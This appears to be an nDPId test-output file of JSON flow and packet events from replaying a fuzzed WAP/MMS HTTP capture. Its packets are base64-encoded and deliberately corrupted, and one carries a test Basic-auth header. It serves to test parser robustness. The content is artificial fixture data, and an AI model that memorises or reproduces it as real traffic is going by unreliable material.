00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":86,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":2,"flow_last_seen":1031854557802,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1031854557802,"pkt":"AFCLk5N8CAAgsl17CABFAAAsxMxAAEAGF8WsFAMNrBQDBQBQCi7KxfhE5UFs9mASgyyW7gAAAgQFtA=="}
00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":87,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":3,"flow_last_seen":1031854557802,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1031854557802,"pkt":"CAAgsl17AFCLk5N8CABFAAAoNktAAIAGZkqsFAMFrBQDDQouAFDlQWz2ysX4RVAQIjgPoAAAAgQFtAAA"}
00905{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":88,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1031854557802,"flow_last_seen":1031854557802,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1460,"flow_avg_l4_payload_len":365,"midstream":0,"thread_ts_msec":1031854557802,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.20.3.13","src_port":2606,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"172.20.3.13","url":"172.20.3.13\/servlets\/mms?message-id=189301","code":0,"content_type":"","user_agent":""}}
00196{"error_event_id":2,"error_event_name":"Unknown L3 protocol","datalink":1,"packet_id":91,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","protocol":2048,"global_ts_msec":1031854557899}
00355{"packet_event_id":1,"packet_event_name":"packet","packet_id":91,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":54,"pkt_l4_len":0,"thread_ts_msec":1031854557803,"pkt":"AFCLk5N8kgAgsl2cCAAlcwAoxM5AAEAGF8esFAMNrBQDBQB+Ci7KxfhF5UF0EVAQgyynkAAA"}
00598{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":92,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854557975,"flow_last_seen":1031854557975,"flow_idle_time":7440000,"flow_min_l4_payload_len":1460,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1460,"flow_avg_l4_payload_len":1460,"midstream":1,"thread_ts_msec":1031854557975,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.72.5","src_port":80,"dst_port":2606,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
02421{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":92,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":1,"flow_last_seen":1031854557975,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":1031854557975,"pkt":"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"}
00913{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":93,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1031854557802,"flow_last_seen":1031854557975,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":3279,"flow_avg_l4_payload_len":468,"midstream":0,"thread_ts_msec":1031854557975,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.20.3.13","src_port":2606,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"172.20.3.13","url":"172.20.3.13\/servlets\/mms?message-id=189301","code":0,"content_type":"","user_agent":""}}
00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":97,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854562320,"flow_last_seen":1031854562320,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1031854562320,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.20.3.13","src_port":2607,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":97,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":1,"flow_last_seen":1031854562320,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1031854562320,"pkt":"CAAgsl1rAFCLk5N8CABFAAAsPltAAIAGXkasFAMFrBQDDQovAFDlUj+sAAAAAGACIADqbQAAAgQFtAAA"}
00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":98,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":2,"flow_last_seen":1031854562321,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1031854562321,"pkt":"AFCLk5N8CAAgsl17CABFAAAsxNJAAEAGF7+sFAMNrBQDBQBQCi\/K2yc15VI\/rWASgyyVHwAAAgQFtA=="}
00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":99,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":3,"flow_last_seen":1031854562321,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1031854562321,"pkt":"CAAgsl17AFCLk5N8CABFIAAoP0tAAIAGXUqsFAMFrBQDDQovAFDlUj+tytsnNlAQIjgN0QAAAgQFtAAA"}
00598{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":100,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854562321,"flow_last_seen":1031854562321,"flow_idle_time":7440000,"flow_min_l4_payload_len":1460,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1460,"flow_avg_l4_payload_len":1460,"midstream":1,"thread_ts_msec":1031854562321,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.20.3.13","src_port":9587,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
02421{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":100,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":1,"flow_last_seen":1031854562321,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":1031854562321,"pkt":"CAAgsl17ACVzAJN8CABFAAXcQEtAAIAGVpasFAMFrBQDDSVzAFDlUj+tytsnNlAQInStCAAAUE9TVCAvc2VydmxldHMvbW1zIEhUVFAvES4xDQpIbnN0OiAxNzIuMjAuMy4xMw0KT3B0OiAiaHR0cDovL3d3dy53My5vcmcvMTk5OS8wNi8yNC1DQ1BQZXhjaGFuZ2UiOyBucz01Ng0KQ29sdGVudC1UeXBlOiBhcHBsaWNhdGlvbi92bmQud2FwLm1tcy1tZXNzYWdlDQpBY2NlcHQ6INtwcGxpY2F0aW9uL3ZuZC53YXAubW1zLW1lc3NhZ2UNCkNhY2hlLUNvbnRyb2w6IG5vLWNhY2hlDQpBY2NlcHQtTGFuZ3VhZ2U6IGVuDQpVc2VyLEFnZW50OiBTb255RXJpY3Nzb25UNjgvUjIwMUENCEFjY2VwdC1DaGFyc2V0OiAqDQo1Ni1Qcm9maWxlLURpZmYtMTogPD94bWwgdmVyc2lvbj0lcwAwIj8+PHpkZjpSREYgeG1sbnM6cmRmPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5LzAyLzIyLXJkZi1zeW50YSVzAHMjInhtbG5zOnByZj0iaHR0cDovL3d3VC53YXBmb291bS5vcmcvVUFQbk9GL2NjcHBzY2hlbWEtMTk5OTEwMTQjIj48IS0tIGJyb3dzZXIgdmVuZG9yIHNpdGU6IERlZmF1bHQgZGVzY3JpcHRpb34gb2YgcHJvcGVydGllcyAtLT48cmRmOkRlc2NyaXB0aW9uPjxwcmY6Q2NwcEFjY2VwdD48cmRmOkJhZz48cmRmOmxpPmFwcGxpY2F0aW9uL3ZuZC53YXAubW1zLW1lc3NhZ2U8L3JkZjpsaT48L3JkRzpCYWc+PC9wcmY6Q2NwcEFjY2VwdD5XL3JkZjpEZXNjcmlwdGlvbj48L3JkZjpSREY+DQo1Ni1Qcm9maWxlLURpZmYtMjogPD94bWwgdmVyc2lvbj0iMS4wIj8+PHJkZjpSREYgcG18bnM6cmRmPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5LzAyLzIyLXJkZi1zeW50YXgtbnMjInhtbLVzOnByZj0iaHR0cDovL3d3dy53YXBmb3J1bS5vcmcvVUFQUk9GL2NjcHBzY2hlbWEtMTk5OTEwMDQjIj48IS0tIGJyb3dzZXIgdmVuZG9yIHNpdGU6IERlZmF1bHQgZGVzY3JpcHRpb24gb2YgcHJvcGVydGllcyAtLT58ckhmOkRlc2NyaXB0aW9uPjxwcmY6Q2NwcEFjY2VwdC1DaGFyc2V0PjxyZGY6QmFnPjxyZGY6bGk+KjwvcmRmOmxpPjwvcmRmOkJhZz48L3ByZjpDY3BwQWNjZXB0LUNoYXJzZXQ+PC9yZGY6RGVzY3JpcHRpb24+PC9yZGY6UkRGPg0KNTYtUHJvZmlsZS1EaWZmLTM6IDw\/eG1sIHZlcnNpb249IjEuMCI\/PjxyZGY6UkRGIHhtbG5zOnJkZj1MaHR0cDovL3d3dy53My5vcmcvMTk5OS8wMi8yMi1yZGYtc3ludGF4LW5zIyJ4bWxuczpwcmY9Imh0dHA6L9x3d3cud2FwZm9CdW0ub3JnL1VBUFJPRi9jY3Bwc2NoZW1hLTE5OTkxMDE0IyI+PCEtLSBicm93c2VyIHZlbmRvciBzaXRlOiBEZWZhdWx0IGRlc2NyaXB0aW9uIG9mIHByb3BlcnRpZXMxLS0+PHJkZk5EZXNjcmlwdGlvbj48cHJmOkNjcHBB9mNlcHQtTGFuZ3VhZ2U+PHJkZjpTZXE+PHJkZjpsaT5lbjwvcmRiOmxpPjwvcmRmOlNlcT48L3ByZjpDY3BwQWNjZXB0LUxhbmd1YWdlPjwvcmRmOkRlc2NyaXB0OG9uPjwvcmRmOlJERj4NCjU2LVByb2ZpbGUJICJodHRwOi8vd2FwLnNvbnllcmljc3Nvbm1vYmlsZS5jb20vVUFwcm9mL1Q2OFI="}
00664{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":100,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854562321,"flow_last_seen":1031854562321,"flow_idle_time":7440000,"flow_min_l4_payload_len":1460,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1460,"flow_avg_l4_payload_len":1460,"midstream":1,"thread_ts_msec":1031854562321,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.20.3.13","src_port":9587,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":103,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854562401,"flow_last_seen":1031854562401,"flow_idle_time":7440000,"flow_min_l4_payload_len":19,"flow_max_l4_payload_len":19,"flow_tot_l4_payload_len":19,"flow_avg_l4_payload_len":19,"midstream":1,"thread_ts_msec":1031854562401,"l3_proto":"ip4","src_ip":"172.20.2.13","dst_ip":"172.20.3.5","src_port":80,"dst_port":2607,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00661{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":103,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":1,"flow_last_seen":1031854562401,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":197,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":197,"pkt_l4_len":39,"thread_ts_msec":1031854562401,"pkt":"AFCLk5N8CAAgsl17CABFAAA7xNRAAEAGFzKsFAINrBQDBQBQCi\/K2yc25VJHCFAYgyz\/yAAASFRUUC8xLjEgMjAwIE9LDQpTZXN2ZXI6IFJlc2luLzIuMC4xDQpDb250ZW50LVR5cGU6IGFwcGxpY2F0eW9uL3ZuZC53YXAubW1zLW1lc3NhZ2UNCnRvbnRlbnQtTGVuZ3RoOiAwDQpEYXRlOiBUaHUsIDEyIFNlcCAyMDAyIDE4OjE2OjAyIEdNVA0KDQo="}
00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":104,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854562488,"flow_last_seen":1031854562488,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1031854562488,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.3.5","src_port":53193,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":104,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":1,"flow_last_seen":1031854562488,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1031854562488,"pkt":"AHWLk5N8CAAgsl17CABFAAAwxNVAAEAGF7isFAMNrBQDBc\/JAFDK5CpLAAAAAHACgyzcpwAAAQEEAgIEBbQ="}
00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":105,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854562488,"flow_last_seen":1031854562488,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1031854562488,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.20.35.13","src_port":80,"dst_port":53136,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":105,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":1,"flow_last_seen":1031854562488,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1031854562488,"pkt":"CAAgsl17AFCLk5N8CABFAAAsQ0tAAIAGWUasFAMFrBQjDQBQz5DlU6AgyuQqTGASIjjNHQAAAgQFtG4v"}
00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":106,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854562488,"flow_last_seen":1031854562488,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854562488,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.3.5","src_port":53136,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":106,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":1,"flow_last_seen":1031854562488,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1031854562488,"pkt":"AFCLk5N8CAAgsl17CABFAAAoxNZAAEAGF7+sFAMNrBQDBc+QAFDK5CpM5VPMIVAQgyyD5gAA"}
00892{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":107,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":2,"flow_last_seen":1031854562489,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":370,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":370,"pkt_l4_len":336,"thread_ts_msec":1031854562489,"pkt":"AFCLkxN8CAAgsl17CABFAAFkZddAAEAGFoKsFAMNrBQDBc+QAFDK5CpN5VOgIVAYgyyj7gAAUE9TVCAvcHBnY3RybC9wcGdjb24lcwBsbG9naWMuZGxsIEhUVFAvZC4xDQpBdXRob3JpemF0aXhuOiBCYXNpYyBiRzFqWDNjNlZHVnpkREV5TXpRPQ0KQ29udGVudC1UeXBlOiBtdWx0aXBhcnQvcmVsYXRlZDsgYm91bmRhcnk9Im1zZyVzAHRfMF8xMDM4XzEwMzE4NTQ1NjI0ODQiOyB0eXBlPSJhcHBsaWNhdGlvTi94bWwiDQpVc2VyLUFnZW50OiBNTVMtUmVsYXktRGVsaXZlcnlJbml0aWF0b3INCkFjY2VwdDogYXBwbGljYXRpb24veG1sDQpDb25uZWN0aW9uOiVzAGVwLWFsaXZlDQpIb3N0OiAxNzIuMjAuMy41DQpDb250ZW50LWxlbmd0aDogODAwDQoNGg=="}
00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":107,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1031854562488,"flow_last_seen":1031854562489,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":316,"flow_tot_l4_payload_len":316,"flow_avg_l4_payload_len":158,"midstream":1,"thread_ts_msec":1031854562489,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.3.5","src_port":53136,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
00595{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":108,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854562489,"flow_last_seen":1031854562489,"flow_idle_time":7440000,"flow_min_l4_payload_len":800,"flow_max_l4_payload_len":800,"flow_tot_l4_payload_len":800,"flow_avg_l4_payload_len":800,"midstream":1,"thread_ts_msec":1031854562489,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.70.3.5","src_port":53136,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
01536{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":108,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":1,"flow_last_seen":1031854562489,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":854,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":854,"pkt_l4_len":820,"thread_ts_msec":1031854562489,"pkt":"AFCLk5N8CAAgsl17CABFAANIxNhAAEAGFJ2sFAMNrEYDBc+QAFDK5CuI5VOgYVAYgyy9cwAALS1tc2dwYXJ0XzBfMTAzOF8xMDMxODU0NTYyNDg0DQpDb250s250LVR5cGU6IGFwcGxpY2F0em9uk3htbA0KDQo8P3htbCB2ZXJzaW9uPSIxLjAiPz4NCjwhRE9DVFlQRSBwYXAgUFVCTElDICItLy9XQVBGT1JVTS8vRFREIFBBUCAxLjAvL0VOIg0KICAgICAgICAgNmh0dHA6Ly93d3cud2FwZm9ydW0ub3JnL0RURC9wYXBfMS4wLmR0ZCI+DQo8cCBwPg0KICA8cHVzaC1tZXNzYWdlIHB1dmgtaWQ9IjE4OTMwMV8xMDMxODU0NTYyNDgyXzEwMzhAZ2VjZHMyLm1vYmlsaXR5bGFiLm5lWSIgZGVsaXZlci1iZWZvcmUtdGltZXN0YW1wPSIyMDAyLTA5LTEyVDE5OjE0OjQ4SiIgcHBnLW5vdGlmeS1yZXF1ZXN0ZWQtdG89Imh0dHA6Ly8xNzIuMjAuMy4xMytzZXJ2bGV0cy9tbXMiPg0KICAgITxhZGRyZXNzIGFkZHJlc3MtdmFsdWU9IldBUFBVU0g9KzQ5MTcwNjEwMTAwNC9UWVBFPVBMTU5AMTcyLjIwLjMuNSI+PC9hZGRyZXNzPg0KIDIgIDxxdWFsaXR5LW9mLXNlcnZpY2UgcHJpb3JpdHk9Im1lZGl1bSIgZGVsaXZlcnktbWV0aG9kPSJ1bmNvbmZpcm1lZCI+PC9xdWFsaXR5LW9mLSVzAHZpY2U+DQogIDwvdnVzaC1tZXNzYWdlPg0KPC9wYXA+DQoNCi0tbXNncGFydF8wXzEwWDhfMTAzMTg1NDU2MjQ4NA0KQ29udGVudC1UeXBlOiBjcHBsaVdhdGlvbi92bmQud2FwLm1tcy1tZXNzYWdlDQpYLWphcC1BcHBsaWNhdGlvbi1JZDogNA0KDR+Mho2QizE4OTMwMEBnZWNkczIubW9iaWxpdHlsYWIubmV0AJcrNDkxNzI2MTAxMDA0L1RZUEU9UExNTleFBD2A2eKVgQ0KLS1tc2dnYXJ0XzBfMTAzOF8xMDMxODU0NTYyNDg0LS0="}
00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":109,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":3,"flow_last_seen":1031854562490,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1031854562490,"pkt":"CAAgsl17AFCLk5N8CABFAAAoREtAAIAGWEqsFAMFrBQDDQBQz5DlW6AhyuQuqFAQHdzk2gAAAgQFtG4v"}
00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":114,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854562690,"flow_last_seen":1031854562690,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854562690,"l3_proto":"ip4","src_ip":"172.20.67.13","dst_ip":"172.20.3.5","src_port":53136,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":114,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":1,"flow_last_seen":1031854562690,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1031854562690,"pkt":"AFCLk5N8CAAgsl17CABFAAAobNpAAEAGF7usFEMNrBQDBc+QAFDK5C6o5VOhNFAQgyx+pAAA"}
